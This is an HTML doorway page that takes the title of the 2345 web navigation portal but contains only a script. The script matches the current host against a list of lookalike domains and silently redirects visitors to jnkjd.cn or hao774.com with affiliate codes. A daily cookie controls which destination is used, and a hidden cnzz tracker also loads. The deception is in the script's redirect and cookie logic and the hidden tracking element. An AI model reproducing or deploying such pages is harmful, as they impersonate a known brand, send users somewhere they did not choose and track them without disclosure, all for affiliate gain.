<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>2345网址导航－开创中国百年品牌</title>
</head>
<body>
  <script>
    var date = new Date()
  function getCookie(name) {
    var nameEQ = name + "=";
  var ca = document.cookie.split(';');    //把cookie分割成组
  for(var i=0;i < ca.length;i++) {
    var c = ca[i];                      //取得字符串
    while (c.charAt(0)==' ') {          //判断一下字符串有没有前导空格
      c = c.substring(1,c.length);      //有的话，从第二位开始取
    }
    if (c.indexOf(nameEQ) == 0) {       //如果含有我们要的name
      return unescape(c.substring(nameEQ.length,c.length));    //解码并截取我们要值
    }
  }
  return false;
}

   //清除cookie
   function clearCookie(name) {
    setCookie(name, "", -1);
  }

//设置cookie
function setCookie(name, value, seconds) {
   var expires = "";
   date.setTime(date.getTime()+seconds);
   expires = "; expires="+date.toGMTString();
   document.cookie = name+"="+escape(value)+expires+"; path=/";   //转码并赋值
}
//}
window.onload = function () {
  var currentDomain = window.location.host;
  var browser=navigator.appName 
  var domains = [
  {'hao.z8q.cc': 'tg21145'},
  {'hao5.z8q.cc': 'tg21145'},
  {'hao.221199.com': 'tg21145'},
  {'hao.335335.cc': 'tg21145'},
  {'hao.8m3.cc': 'tg21145'},
  {'hao.337337.cc': 'tg21145'},
  {'hao.sogo123.cc': 'tg21145'},
  {'2345tm.lft2.com': '35658-0003'},
  {'hao51.z6q.cc': '35658-0001'},
  {'ie.8m3.cc': '35658-0008'},
  {'www.337337.cc': '35658-0008'},
  {'www.sogo123.cc': '35658-0008'}
  ]
  for (var i = 0; i < domains.length; i++) {
    for (var key in domains[i]) {
      if (currentDomain === key) {
        var parmas = domains[i][key]
      }
    }
  }
  var nowTime = Date.parse(new Date());
  var year = date.getFullYear();
  var month = date.getMonth() + 1
  var day = date.getDate()
  var leftTime = parseInt(Date.parse(year + '-'+ month +'-'+ day + 'T23:59:59+08:00')) - parseInt(nowTime)
    if(browser=="Microsoft Internet Explorer"){
      var b_version=navigator.appVersion;
      var version=b_version.split(";");
      var trim_Version=version[1].replace(/[ ]/g,"");
      if(trim_Version !=="MSIE8.0") {
        if (getCookie('dh11') != 123456) {
          setCookie('dh11', 123456, leftTime)
               window.location.href = 'http://www.jnkjd.cn/1111.html?m=' + parmas;
     } else{
               window.location.href = 'https://www.hao774.com/?35658-0008'
   }
 } else {
            window.location.href = 'https://www.hao774.com/?35658-0008'
 }
} else {
  if (getCookie('dh11') != 123456) {
    setCookie('dh11', 123456 ,leftTime)
            window.location.href = 'http://www.jnkjd.cn/1111.html?m=' + parmas;
} else{
            window.location.href = 'https://www.hao774.com/?35658-0008'
}
}
}
</script>
<div style="display:none">
<script src="http://s4.cnzz.com/stat.php?id=1257149079&web_id=1257149079" language="JavaScript"></script>
</div>
</body>
</html>
